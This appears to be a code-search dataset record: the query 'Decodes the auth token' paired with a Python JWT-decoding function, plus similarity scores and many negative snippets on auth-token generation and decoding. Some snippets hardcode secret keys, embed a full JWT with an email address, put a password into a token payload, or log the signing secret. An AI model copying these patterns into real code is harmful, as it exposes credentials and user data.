UserPreferences.objects.filter(user=user).first()\n if prefs:\n if prefs.rt_token:\n cipher_suite = Fernet(settings.CRYPTO_KEY)\n return cipher_suite.decrypt(prefs.rt_token.encode('utf-8')).decode('utf-8')\n return None", "def generate_token():\n chars = ('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')\n rand = random.SystemRandom()\n random_string = ''.join(rand.choice(chars) for _ in range(40))\n return hmac.new(\n config.SECRET_KEY,\n random_string,\n hashlib.sha256\n ).hexdigest()", "def for_user(cls, user):\n\n token = super().for_user(user)\n\n TokenMeta.objects.get_or_create(\n jti=token['jti'],\n token=str(token),\n )\n\n return token", "def make_token():\n return secrets.token_urlsafe(36)", "def create_token(self):\n ts_datetime = self.logged_at or self.created_at\n ts = int(mktime(ts_datetime.timetuple()))\n key = base64.encodestring(self.email)\n base = \"{}{}\".format(key, ts)\n salt, hsh = self.password.split('$')\n return \"{}$${}\".format(key, get_hexdigest(salt, base))", "def get(self):\n # Login of authorized user stores in Flask g object\n user = User.query.filter_by(username=g.user.username).first()\n # Generate token\n token = user.generate_auth_token()\n # Send token in ASCII format\n return {'token': token.decode('ascii')}", "def _generate_jwt_token(self):\n payload = jwt_payload_handler(self)\n token = jwt_encode_handler(payload)\n return token", "def login_user(id, password):\n auth = init_auth()\n\n try:\n user = auth.sign_in_with_email_and_password(id,password)\n token = user['localId'] #['idToken']\n #print(\"Success\")\n return token\n except:\n print(\"invalid user or password. 
Please try again\")", "def get_auth_token(cls):\n return jsonify({\n 'user': current_user.serialize(),\n 'token': current_user.get_auth_token(),\n })", "def generate_token(email):\n access_token = create_access_token(email)\n return access_token", "def token(self):\n payload = {\n 'id': str(self.id),\n 'username': self.username,\n \"exp\": datetime.now() + timedelta(days=2)\n }\n return jwt.encode(payload, SECRET_KEY).decode('utf-8')", "def generate_refresh_token(self):\n return gen_api_key(length=self.token_length)", "def encode_auth_token(user_id: int, user_name:str, user_login:str, perfil_nome:str) -> bytes:\n try:\n payload = {\n 'exp': datetime.datetime.utcnow() + datetime.timedelta(days=1, seconds=5),\n 'iat': datetime.datetime.utcnow(),\n 'uid': user_id,\n 'name': user_name,\n 'login': user_login,\n 'perfil': perfil_nome,\n }\n return jwt.encode(\n payload,\n key,\n algorithm='HS256'\n )\n except Exception as e:\n return e", "def login(user: User):\n try:\n time = datetime.datetime.utcnow() + datetime.timedelta(seconds=60)\n payload = {\"user_id\": user.name, \"password\": user.password, \"exp\": time}\n token = jwt.encode(payload, JWT_SECRET_KEY, JWT_ALGORITHM).decode('utf-8')\n return {\"token\": token}\n except Exception:\n return {\"message\": \"Error in creating Token\"}", "def _generate_token(self):\n return sha1(\"%s#%s\" % (time(),\n self.app.cfg['sessions/secret'])).hexdigest()", "def auth_token(self):", "def _create_security_token(user):\n timestamp = int(time.time())\n plaintext = \"%x %s\" % (timestamp, user.email)\n nearest_mult_of_16 = 16 * ((len(plaintext) + 15) // 16)\n # Pad plaintest with whitespace to make the length a multiple of 16,\n # as this is a requirement of AES encryption.\n plaintext = plaintext.rjust(nearest_mult_of_16, ' ')\n if _DISABLE_CRYPTO:\n body = plaintext\n sig = \"sig\"\n else:\n key_storage = KeyStorage.get()\n body = AES.new(key_storage.aes_key, AES.MODE_CBC).encrypt(plaintext)\n hmac_key = key_storage.hmac_key\n if type(hmac_key) == unicode:\n # Crypto requires byte strings\n hmac_key = hmac_key.encode('utf8')\n sig = HMAC.HMAC(key=hmac_key, msg=body).hexdigest()\n return '%s:%s' % (sig, body)", "def create_jwt(user, secret):\n logger.debug(\"Create JWT with secret %s\" % secret)\n # username = request.POST['username']\n # password = request.POST['password'\n\n expiry = datetime.datetime.now() + datetime.timedelta(seconds=30)\n expiry_s = time.mktime(expiry.timetuple())\n if user.is_authenticated():\n internalid = user.authprofile.internalid\n payload = {'username': user.username, 'expiry': expiry_s, 'type': \"AuthenticatedUser\", 'internalid': internalid, 'email': user.email}\n token = jws.sign(payload, secret, algorithm='HS256')\n else:\n payload = {'expiry':expiry_s, 'type': \"AnonymousUser\", 'internalid': None, 'email': None}\n token = jws.sign(payload, secret, algorithm='HS256')\n logger.debug(\"Payload: %s\" % payload)\n # logger.info(\"Token: %s\" % token)\n return token", "def get_user_token(username, expires_at=None):\n issued_at = datetime.utcnow()\n token = AccessToken()\n token.payload.update(\n {\n \"email\": f\"{username}@funmooc.fr\",\n \"exp\": expires_at or issued_at + timedelta(days=2),\n \"iat\": issued_at,\n \"language\": settings.LANGUAGE_CODE,\n \"username\": username,\n }\n )\n return token" ]
[ "0.75365555", "0.7299488", "0.71115804", "0.710188", "0.690935", "0.685729", "0.6822128", "0.6820735", "0.68139696", "0.67837673", "0.67776555", "0.6730933", "0.66888976", "0.6683402", "0.6680387", "0.66462904", "0.66453385", "0.65843165", "0.6561365", "0.6530449", "0.6494656", "0.6485782", "0.64657134", "0.6456405", "0.64296424", "0.6416558", "0.63899386", "0.63889116", "0.6364325", "0.63623685", "0.63617295", "0.6360795", "0.63567245", "0.63421756", "0.6309229", "0.6308884", "0.62934697", "0.6265049", "0.6258337", "0.62008256", "0.6184071", "0.6184071", "0.61553794", "0.6145635", "0.6122362", "0.61186564", "0.6115072", "0.6101673", "0.6097905", "0.6079587", "0.6067275", "0.60359836", "0.603189", "0.6012647", "0.5998637", "0.5981397", "0.595506", "0.5953607", "0.59415144", "0.59293866", "0.5909976", "0.5886134", "0.58749694", "0.5873821", "0.5857879", "0.5824199", "0.5818633", "0.5809484", "0.5803751", "0.5801352", "0.57960504", "0.57913715", "0.57880044", "0.5787756", "0.57585347", "0.5758367", "0.5755521", "0.57516795", "0.5739689", "0.57282627", "0.5719842", "0.57190067", "0.5713964", "0.5710261", "0.5706108", "0.5702149", "0.56882274", "0.56839937", "0.567408", "0.56531644", "0.5651009", "0.56500983", "0.5643937", "0.56320184", "0.56160235", "0.561464", "0.56124467", "0.5596971", "0.5585854", "0.55810916" ]
0.65751797
18
Decodes the auth token
def decodeAuthToken(authToken): try: return jwt.decode(authToken, current_app.config['SECRET_KEY'], algorithm='HS256')['sub'] except jwt.ExpiredSignatureError: return 'signature expired, Please login again' except jwt.InvalidTokenError: return 'Invalid token'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def decode_auth_token(auth_token):\n try:\n payload = jwt.decode(auth_token, Config.SECRET_KEY,algorithms='HS256')\n return payload\n except jwt.ExpiredSignatureError:\n return 'Signature expired. Please log in again.'\n except jwt.InvalidTokenError:\n return 'Invalid token. Please log in again.'", "def decode(encoded_token):\n return jwt.decode(encoded_token, key=settings.JWT_AUTH['JWT_SECRET_KEY'])", "def decode_auth_token(auth_token):\n if len(auth_token) != 139:\n return \"Invalid token. Please log in again.\"\n try:\n payload = jwt.decode(auth_token, key)\n is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)\n if is_blacklisted_token:\n return 'Token blacklisted. Please log in again.'\n else:\n return payload['sub']\n except jwt.ExpiredSignatureError:\n return 'Signature expired. Please log in again.'\n except jwt.InvalidTokenError:\n return 'Invalid token. Please log in again.'", "def decode_auth_token(auth_token):\n try:\n payload = jwt.decode(auth_token, app.config.get('SECRET_KEY'))\n\n # is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)\n # if is_blacklisted_token:\n # return 'Token blacklisted. Please log in again.'\n # else:\n return payload['sub']\n except jwt.ExpiredSignatureError:\n return 'Signature expired. Please log in again.'\n except jwt.InvalidTokenError:\n return 'Invalid token. Please log in again.'", "def decode_token(token):\n\n return jwt.decode(\n token, settings.JWT_SECRET, algorithms=[settings.JWT_ALGO])", "def decode_auth_token(auth_token):\n try:\n payload = jwt.decode(auth_token, Config.SECRET_KEY,algorithms='HS256')\n return payload['role']\n except jwt.ExpiredSignatureError:\n return 'Signature expired. Please log in again.'\n except jwt.InvalidTokenError:\n return 'Invalid token. Please log in again.'", "def decode_token(token):\n decoded_token = jwt.decode(token, secret_key, algorithms=['HS256'])\n return decoded_token", "def decode_auth_token(auth_token):\n try:\n payload = jwt.decode(auth_token, key)\n return payload['sub']\n except jwt.ExpiredSignatureError:\n return 'Signature expired. Please log in again.'\n except jwt.InvalidTokenError:\n return 'Invalid token. Please log in again.'", "def decode(token):\n return jwt.decode(token, app.config[\"JWT_SECRET\"], algorithms=[\"HS256\"])", "def decode_auth_token(auth_token): \n try: \n payload = jwt.decode(auth_token, getattr(settings, \"SECRET_KEY\", \"\"),algorithms=['HS256']) \n is_blacklisted_token = User.check_blacklist(auth_token)\n if is_blacklisted_token:\n return False,'Token blacklisted. Please log in again.'\n else:\n return True, payload['sub']\n except jwt.ExpiredSignatureError:\n return False,'Signature expired. Please log in again.'\n except jwt.InvalidTokenError:\n return False,'Invalid token. Please log in again.'", "def decode_auth_token(auth_token, config):\n secret_key = config['JWT_SECRET_KEY']\n try:\n payload = jwt.decode(auth_token, secret_key)\n return payload['sub']\n except jwt.ExpiredSignatureError as error:\n raise ExpiredToken from error\n except (jwt.InvalidTokenError, jwt.DecodeError) as error:\n raise InvalidToken from error", "def parse_token(token):\n return jwt.decode(token, app.config['JWT_SECRET'])", "def decode_auth_token(secret_key, auth_token):\n try:\n payload = jwt.decode(auth_token, secret_key) \n is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)\n if is_blacklisted_token:\n return 'Token blacklisted. Please log in again.' 
\n else: \n return payload['sub']\n except jwt.ExpiredSignatureError:\n return 'Signature expired. Please log in again.'\n except jwt.InvalidTokenError:\n return 'Invalid token. Please log in again.'", "def decode_auth_token(auth_token: str) -> Union[str, int]:\n try:\n payload = jwt.decode(auth_token, key, algorithms='HS256')\n \n user=Usuario.query.filter_by(id=payload['uid']).first()\n is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)\n if is_blacklisted_token:\n return 'Conta deslogada. Por favor realizar o login novamente.'\n elif user.ativo!=True:\n return 'Conta invativa. Por favor entrar em contato com o administrador.'\n else:\n return payload['uid']\n except jwt.ExpiredSignatureError:\n return 'Token expirado. Por favor realizar o login novamente.'\n except jwt.InvalidTokenError:\n return 'Token inválido. Por favor realizar o login novamente.'", "def decode_token(token):\n payload = None\n try:\n payload = jwt.decode(token.encode('utf-8'), '1$Arh\"1bWa/7+OS', algorithm='HS256')['u_id']\n except jwt.InvalidTokenError:\n pass\n return payload", "def decode_token(token):\n try:\n # Decode token with our secret key\n payload = jwt.decode(token, SECRET_KEY)\n return payload['sub']\n except jwt.ExpiredSignatureError:\n # token has expired\n return \"Timed out. Please login to get a new token\"\n except jwt.InvalidTokenError:\n return \"Invalid token. Please register or login\"", "def decode_token(token):\n try:\n payload = jwt.decode(\n token, app.config.get('SECRET_KEY'), algorithms='HS256')\n return payload['sub']\n except jwt.ExpiredSignatureError:\n return \"Expired token. Please login to get a new token\"\n except jwt.InvalidTokenError:\n return \"Invalid token. Please register or login\"", "def decodeJWT(self, token):\n try:\n return jwt.decode(token, self.secret, algorithms=[self.algorithm])\n except jwt.exceptions.InvalidSignatureError:\n raise ValueError(f'The following JWT is invalid: {token}')", "def decode(encoded):\n if encoded is None:\n return None\n\n try:\n s = decode(APP.config['SECRET_KEY'], encoded)\n return json.loads(s)\n except Exception as err:\n LOGGER.error('Error decoding auth: %s' % str(err))\n raise err", "def decode_token(token):\n try:\n # try to decode the token using our SECRET variable\n payload = jwt.decode(token, app.config.get('SECRET_KEY'), algorithms=['HS256'])\n return payload['sub']\n except jwt.ExpiredSignatureError:\n # the token is expired, return an error string\n return \"Expired token. Please login to get a new token\"\n except jwt.InvalidTokenError:\n # the token is invalid, return an error string\n return \"Invalid token. Please register or login\"", "def get_token(self):\n\n try:\n return jwt.decode(self.fetch_token(), KEY, algorithms=['HS256'])\n except jwt.exceptions.DecodeError:\n raise InvalidToken", "def decode_token(token: str):\n try:\n decoded = b64decode(token.encode())\n key_data = orjson.loads(decoded)\n timestamp = int(key_data['t'])\n pub_key = key_data['p']\n signature = key_data['s']\n except (ValueError, TypeError, KeyError, orjson.JSONDecodeError, binascii.Error) as e:\n logging.debug(\"Invalid token format: %s\", token)\n raise HTTPException(status_code=403, detail=\"Invalid token\") from e\n\n if timestamp > time.time() or timestamp < time.time() - TOKEN_EXPIRE_INTERVAL:\n raise HTTPException(status_code=403, detail=\"Token expired\")\n\n try:\n check_signature(\n ''.join([pub_key, str(timestamp)]),\n signature,\n pub_key\n )\n except InvalidSignature as e:\n logging.error(\"Invalid token signature. 
Might be access violation.\")\n raise HTTPException(status_code=403, detail=\"Invalid token\") from e\n\n return pub_key", "def decode_token_appengine(credentials, token, verify=False):\n return _decode_token(credentials, token, False)", "def decode_token(token, options=JWT_OPTIONS):\n return jwt.decode(\n token,\n SECRET_KEY,\n issuer=JWT_ISSUER,\n audience=JWT_AUDIENCE,\n options=options,\n algorithms=(JWT_OPTIONS_ALGORITHM,)\n )", "def decode_token(token):\n try:\n # try to decode the token using our SECRET variable\n payload = jwt.decode(token, os.environ.get('SECRET', 'test'))\n return \"\", payload['sub']\n except jwt.ExpiredSignatureError:\n # the token is expired, return an error string\n return \"Expired token. Please login to get a new token\", None\n except jwt.InvalidTokenError:\n # the token is invalid, return an error string\n return \"Invalid token. Please register or login\", None", "def get_payload(cls, token):\n \n secret = cls.secret\n algo = cls.algo\n decoded = jwt.decode(token, secret, algo)\n return decoded", "def _decode(token):\n if token is None:\n return None\n # Pad the token out to be divisible by 4.\n padded_token = bytes(token, 'utf8') + '='.encode() * (4 - (len(token) % 4))\n decoded_token = base64.urlsafe_b64decode(padded_token)\n token_dict = json.loads(decoded_token)\n if not token_dict or not isinstance(token_dict, dict):\n raise ValueError('Invalid pagination token: {}').format(token_dict)\n return token_dict", "def decode_request(self, data):\n return decode_jwt(data[\"jwt\"], data[\"cert_name\"], self.node.node_name, self.node.id)", "def get_auth(self, as_string: bool=True):\n enc = base64.b64encode('{}:{}'.format(APIAuthentication.token_code, APIAuthentication.api_token).encode())\n if as_string:\n return enc.decode()\n else:\n return enc", "def verify_token(self, token: str) -> str:\n return decode(self.rd.hget(\"auth:by_token\", token))", "def decode_token(self, token: str, max_age: int) -> Optional[object]:\n try:\n return self.serializer.loads(token, max_age)\n except (BadSignature, SignatureExpired) as e:\n return None", "def parse_token(req):\n auth_string_list = req.headers.get('Authorization').split()\n # Check in correct format i.e. 
Bearer: 39xds03lda0...\n if len(auth_string_list) == 1:\n raise ValueError('Authorization has invalid format')\n else:\n token = auth_string_list[1]\n data = jwt.decode(token, config.SECRET_KEY, algorithms='HS256')\n return data", "def test_decode_token(token):\n payload = User.decode_auth_token(token)\n user = User.find_by_id(payload.get('id'))\n assert isinstance(user, User) is True\n assert user.email == 'adminuser@test.com'", "def _lookup_token(self):\n path = '/authn/{account}/{login}/authenticate'.format(\n account=self.account, login='admin'\n )\n res = self._post(path, data=self.api_token, skip_auth=True)\n return base64.b64encode(res.text)", "def decode(self, crypto):", "def decode_payload(encoded_payload):\n jwt_secret = app.config['SECRET_KEY']\n payload = jwt.decode(encoded_payload, jwt_secret, algorithms='HS256')\n\n return payload", "def auth_token(self):", "def test_decode_token_invalid(token):\n payload = User.decode_auth_token(f'{token}1337')\n assert isinstance(payload, User) is False\n assert 'Invalid token' in payload", "def _verified_token(self,encoded_token: bytes) -> Dict[str,Union[str,int,bool]]:\n try:\n return jwt.decode(encoded_token,self._SECRET_KEY,algorithms=self._ALGORITHM)\n except jwt.ExpiredSignatureError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.DecodeError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.InvalidAlgorithmError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.InvalidKeyError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.InvalidTokenError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.InvalidIssuerError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.InvalidAudienceError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.InvalidIssuedAtError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.InvalidSignatureError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.ImmatureSignatureError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.MissingRequiredClaimError as err:\n raise HTTPException(status_code=422,detail=str(err))", "def parseAuthResponse(self, code):\n oaDict = {}\n\n # Get tokens\n result = self.fetchToken(code)\n if not result['OK']:\n return result\n self.log.debug('Token RESPONSE:\\n', pprint.pformat(result['Value']))\n oaDict['Tokens'] = result['Value']\n\n # Get user profile\n result = self.getUserProfile(oaDict['Tokens']['access_token'])\n if not result['OK']:\n return result\n oaDict['UserProfile'] = result['Value']\n self.log.debug('User profile RESPONSE:\\n', pprint.pformat(result['Value']))\n\n # Get tokens\n result = self.fetchToken(refreshToken=oaDict['Tokens']['refresh_token'])\n if not result['OK']:\n return result\n oaDict['Tokens'] = result['Value']\n self.log.debug('Token RESPONSE:\\n', pprint.pformat(result['Value']))\n\n return S_OK(oaDict)", "def decode(self, encoded):", "def test_decode_IQ_token(self):\n\n token = 
\"\"\"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJuYW1laWQiOiJhZGZzfHNodzAwMXNhaW50ZWxzZXdoZXJlfGpwX2FkbWluQHVybjphdXRoMDpzYWludGVsc2V3aGVyZSIsImVtYWlsIjoiSmFpbWluLlBhdGVsODMrNTE2NDU2QGdtYWlsLmNvbSIsInVuaXF1ZV9uYW1lIjoiSVFHRU5IT1NQXFxiXy1kcHl4eDBFeVVjR0pIaG1aOCIsImh0dHBzOi8vdGVsZXRyYWNraW5nLmNsb3VkYXBwLm5ldC9pZGVudGl0eS9jbGFpbXMvYWR1c2VyZ3VpZCI6IjMveFFhZ0VrSWttcllBU0VQZHVZRmc9PSIsImh0dHBzOi8vdGVsZXRyYWNraW5nLmNsb3VkYXBwLm5ldC9pZGVudGl0eS9jbGFpbXMvZmlyc3RuYW1lIjoiQWRtaW4iLCJodHRwczovL3RlbGV0cmFja2luZy5jbG91ZGFwcC5uZXQvaWRlbnRpdHkvY2xhaW1zL2xhc3RuYW1lIjoiVGVzdCIsImh0dHBzOi8vdGVsZXRyYWNraW5nLmNsb3VkYXBwLm5ldC9pZGVudGl0eS9jbGFpbXMvb3VuYW1lIjoiU2FpbnRFbHNld2hlcmUiLCJyb2xlIjpbIkRvbWFpbiBVc2VycyIsIkFkbWluaXN0cmF0b3IiLCJJUUdlbkhvc3BTZWMiLCJTYWludEVsc2V3aGVyZSJdLCJ1cG4iOiJKYWltaW4uUGF0ZWw4Mys1MTY0NTZAZ21haWwuY29tIiwiaHR0cDovL3NjaGVtYXMuYXV0aDAuY29tL2lkZW50aXRpZXMvZGVmYXVsdC9wcm92aWRlciI6ImFkZnMiLCJodHRwOi8vc2NoZW1hcy5hdXRoMC5jb20vaWRlbnRpdGllcy9kZWZhdWx0L2Nvbm5lY3Rpb24iOiJzaHcwMDFzYWludGVsc2V3aGVyZSIsImh0dHA6Ly9zY2hlbWFzLmF1dGgwLmNvbS9pZGVudGl0aWVzL2RlZmF1bHQvaXNTb2NpYWwiOiJmYWxzZSIsImh0dHA6Ly9zY2hlbWFzLmF1dGgwLmNvbS9naXZlbl9uYW1lIjoiSVFHRU5IT1NQXFxiXy1kcHl4eDBFeVVjR0pIaG1aOCIsImh0dHA6Ly9zY2hlbWFzLmF1dGgwLmNvbS9waWN0dXJlIjoiaHR0cHM6Ly9zLmdyYXZhdGFyLmNvbS9hdmF0YXIvMzUxYTRiMjU4NWViM2UyYjA1NWI4ZTAyOGY4NzdmNDc_cz00ODBcdTAwMjZyPXBnXHUwMDI2ZD1odHRwcyUzQSUyRiUyRmNkbi5hdXRoMC5jb20lMkZhdmF0YXJzJTJGaXEucG5nIiwiaHR0cDovL3NjaGVtYXMuYXV0aDAuY29tL25pY2tuYW1lIjoiSmFpbWluLlBhdGVsODMrNTE2NDU2IiwiaHR0cDovL3NjaGVtYXMuYXV0aDAuY29tL2VtYWlsX3ZlcmlmaWVkIjoidHJ1ZSIsImh0dHA6Ly9zY2hlbWFzLmF1dGgwLmNvbS9jbGllbnRJRCI6Imtrakgxd3AzdE53RmpEN0M1djI3a0oyWHFWUHE1akhtIiwiaHR0cDovL3NjaGVtYXMuYXV0aDAuY29tL3VwZGF0ZWRfYXQiOiJNb24gSmFuIDE0IDIwMTkgMTU6NTY6MTIgR01UKzAwMDAgKFVUQykiLCJodHRwOi8vc2NoZW1hcy5hdXRoMC5jb20vY3JlYXRlZF9hdCI6IkZyaSBKYW4gMTEgMjAxOSAyMDoxNToyMiBHTVQrMDAwMCAoVVRDKSIsImF1dGhtZXRob2QiOiJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvYXV0aGVudGljYXRpb25tZXRob2QvcGFzc3dvcmQiLCJhdXRoX3RpbWUiOiIyMDE5LTAxLTE0VDIzOjU2OjEyLjg1M1oiLCJodHRwczovL3RlbGV0cmFja2luZy5jbG91ZGFwcC5uZXQvaWRlbnRpdHkvY2xhaW1zL3RlbmFudGlkIjoiMjExNmU5NDMtNTA5NC00MWY3LTgzMTgtODNhYWMyYWMxMTQ3IiwiaHR0cHM6Ly90ZWxldHJhY2tpbmcuY2xvdWRhcHAubmV0L2lkZW50aXR5L2NsYWltcy9jb250ZXh0cGVyc29uaWQiOiIwYTAxMjBhMS04NTU3LTQ4MzEtYTQyNi1hOGJkMDBmNjFkYzkiLCJodHRwczovL3RlbGV0cmFja2luZy5jbG91ZGFwcC5uZXQvaWRlbnRpdHkvY2xhaW1zL3VzZXJuYW1lZm9ybWFsIjoiVGVzdCwgQWRtaW4iLCJodHRwczovL3RlbGV0cmFja2luZy5jbG91ZGFwcC5uZXQvaWRlbnRpdHkvY2xhaW1zL3VzZXJuYW1laW5mb3JtYWwiOiJBZG1pbiBUZXN0IiwiaHR0cHM6Ly90ZWxldHJhY2tpbmcuY2xvdWRhcHAubmV0L2lkZW50aXR5L2NsYWltcy91c2VySWQiOiI0ZmU5OTdmZC00ZGNkLTQxNWItYjJjYi1hOGJkMDBmNjFkYzkiLCJodHRwczovL3RlbGV0cmFja2luZy5jbG91ZGFwcC5uZXQvaWRlbnRpdHkvY2xhaW1zL2ZlYXR1cmV0eXBlaWQiOlsiNCIsIjIiLCIxIiwiMyIsIjUiLCI2Il0sImlzcyI6InRlbGV0cmFja2luZy5jb20iLCJhdWQiOiJodHRwOi8vd3d3LnNlcnZpY2UudGVsZXRyYWNraW5nLmNvbS8iLCJleHAiOjE1NTAwNzM0MzksIm5iZiI6MTU0NzQ4MTQzOX0.UCL-Wc3OSVDI58U5ShOYqLa-DwNc_WQ3BlY5P3CfnVI\"\"\"\n audience = 'http://www.service.teletracking.com/'\n\n secret = 'drMemxWrLen6fCXQA5jO6gXkK/UoZVzPGRDiff7ByPU='\n decoded_token = AuthenticationHandler.validate_and_decode_token(\n token=token, key=secret,\n audience=audience\n )\n self.assertTrue(decoded_token['role'][0] == 'Domain Users', \"Group 1 not match\")\n self.assertTrue(decoded_token['role'][1] == 'Administrator', \"Group 2 not match\")", "def parse_jwt_guest_token(self, raw_token: str) -> Dict[str, Any]:\n secret = current_app.config[\"GUEST_TOKEN_JWT_SECRET\"]\n algo = 
current_app.config[\"GUEST_TOKEN_JWT_ALGO\"]\n audience = self._get_guest_token_jwt_audience()\n return self.pyjwt_for_guest_token.decode(\n raw_token, secret, algorithms=[algo], audience=audience\n )", "def test_decode_token():\n pass", "async def decode(self, jwt_token: str, verify=True) -> dict:\n try:\n jwt_token = jwt_token.replace(f\"{self.auth_schema} \", \"\")\n payload = jwt.decode(\n jwt_token,\n self.jwt_secret,\n algorithms=(self.jwt_algorithm,),\n options={\"verify_exp\": verify},\n )\n\n return payload\n\n except jwt.DecodeError:\n raise InvalidTokenException()\n\n except jwt.ExpiredSignatureError:\n raise TokenExpiredException()", "def get_auth_token(self):\n data = [str(self.id), self.password]\n return login_serializer.dumps(data)", "async def validate_token(self, token: bytes, audience=None) -> Dict[str, str]:\n\n try:\n header = jwt.get_unverified_header(token)\n if \"kid\" not in header:\n raise InvalidToken(\"Missing kid in header\")\n return jwt.decode(token, await self.retrieve_public_key(self._decode_public_key_identifier(header[\"kid\"])), algorithms='RS256', issuer=tedious.config.CONFIG[\"TOKEN\"][\"issuer\"], audience=audience)\n except DecodeError:\n raise InvalidToken(\"Unable to decode token.\")\n except Exception as e:\n raise InvalidToken(str(type(e)) + \" \" + str(e))", "def deserialize_cred(context_obj, encoded_cred):\n\treturn serialize_or_deserialize_cred(context_obj,encoded_cred,DESERIALIZE)", "def get_token(self):\n message = {\n \"request\": \"access_token\",\n \"account\": self.account,\n \"min_valid_period\": self.validity,\n \"application_hint\": \"orpy\",\n }\n try:\n self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n self._sock.connect(self.socket_path)\n self._sock.sendall(json.dumps(message).encode())\n\n data = \"\"\n while True:\n recv = self._sock.recv(16).decode()\n if recv:\n data += recv\n else:\n break\n except socket.error as err:\n raise exceptions.AuthExceptiob(\n err=\"Cannot communicate with the \" \"oidc-agent: %s\" % err\n )\n finally:\n self._sock.close()\n\n token = json.loads(data)\n if token.get(\"status\") == \"failure\":\n raise exceptions.AuthError(err=token.get(\"error\"))\n return token", "def get_token(alias, reg_code, privKey):\n data = json.dumps({\n \"namespace\": alias,\n \"reg_code\": reg_code\n })\n url = endpoint('auth')\n r = requests.post(url,data=data) \n token_str = (r.__dict__['_content']).decode()\n r_token_obj = json.loads(token_str)\n token_cipher = ast.literal_eval( r_token_obj[\"token\"] )\n token_obj = dict()\n token_obj = {\n \"authToken\": decrypt_message( privKey, token_cipher),\n \"expiration_minutes\": r_token_obj[\"expiration_minutes\"],\n \"expiration\": str(datetime.datetime.now() + datetime.timedelta(minutes=r_token_obj[\"expiration_minutes\"]))\n }\n expiration = token_obj[\"expiration\"]\n expiration = parser.parse(expiration)\n if datetime.datetime.now() > expiration:\n print(\"Token has expired\")\n else:\n c = expiration - datetime.datetime.now()\n valid_minutes = str(divmod(c.total_seconds(), 60)[0])\n return token_obj[\"authToken\"]", "def get_auth_token():\n token = g.user.generate_auth_token(24*3600)\n return jsonify({'user_id': g.user.id, 'token': token.decode('ascii')})", "def get_jwt():\n\n try:\n scheme, token = request.headers['Authorization'].split()\n assert scheme.lower() == 'basic'\n return base64.b64decode(token).decode(\"UTF-8\")\n except (KeyError, ValueError, AssertionError):\n raise Forbidden('Invalid Bearer Token.')", "def _upgrade_token(self, http_body):\n 
self.token_string = auth_sub_string_from_body(http_body)", "def extract(self, data):\n return ujson.loads(self.cipher.decrypt(data))", "def get_token(self):\n response = self.client.post(\n url_for('auth.login'),\n data=json.dumps({'username': 'thundoss@gmail.com', 'password': 'denno'}),\n headers={'content_type': 'application/json'})\n return json.loads(response.data)['token']", "def validate_token(self, data):\n try:\n payload = jwt.decode(data, settings.SECRET_KEY, algorithm=['HS256'])\n except jwt.ExpiredSignatureError:\n raise serializers.ValidationError('Verification link has expired')\n except jwt.exceptions.PyJWTError:\n raise serializers.ValidationError('Invalidad token')\n if payload['type'] != 'email_confirmation':\n raise serializers.ValidationError('Invalid token')\n self.context['payload'] = payload\n return data", "def decode_jwt(encoded, key, algorithms = 'HS256'):\n try:\n payload = jwt.decode(\n encoded, \n key, \n algorithms = algorithms\n )\n\n return payload\n # if token has expired:\n except jwt.exceptions.ExpiredSignatureError:\n raise JWTError(\n {\n 'code': 'token_expired',\n 'description': 'Token expired.'\n }, \n 401\n )\n # other exceptions:\n except Exception:\n raise JWTError(\n {\n 'code': 'invalid_header',\n 'description': 'Unable to parse authentication token.'\n }, \n 400\n )", "def decode(data): #@NoSelf", "def validate_token(self, data):\n try:\n payload = jwt.decode(data, settings.SECRET_KEY, algorithms=['HS256'])\n except jwt.ExpiredSignatureError:\n raise serializers.ValidationError('Verification link has expired.')\n except jwt.PyJWTError:\n raise serializers.ValidationError('Invalid token')\n if payload['type'] != 'email_confirmation':\n raise serializers.ValidationError('Invalid token')\n\n self.context['payload'] = payload\n return data", "def tokens_json(self):\n token_id, secret = self.decoded_token\n token_row = self.unauthenticated_token_row\n tokens_encoded = Fernet(secret).decrypt(\n token_row.tokens_fernet.encode('ascii'))\n return json.loads(tokens_encoded.decode('ascii'))", "def __get_authentication_token(self):\n cache = load_json(self._tokenPath)\n return cache[\"authentication_token\"]", "def decode(self, response, request):\n log.debug(\"Decoding authorization.\")\n auth = self._parseAuth(response)\n try:\n self._verifyChallenge(auth[\"challenge\"], request)\n creds = self.buildCredentials(auth, request)\n except KeyError, ke:\n raise LoginFailed(\"{0!r} not in authorization\".format(*ke.args))\n except LoginFailed, lf:\n log.warn(lf)\n raise\n log.debug(\"Decoded credentials: {0}\".format(creds))\n return creds", "def get_token() -> str:\n try:\n bearer, authorization = request.headers['Authorization'].split()\n if 'bearer' not in bearer.lower():\n raise Forbidden('Invalid token. Please login!')\n return authorization\n\n except Exception:\n raise Forbidden('Token is required. 
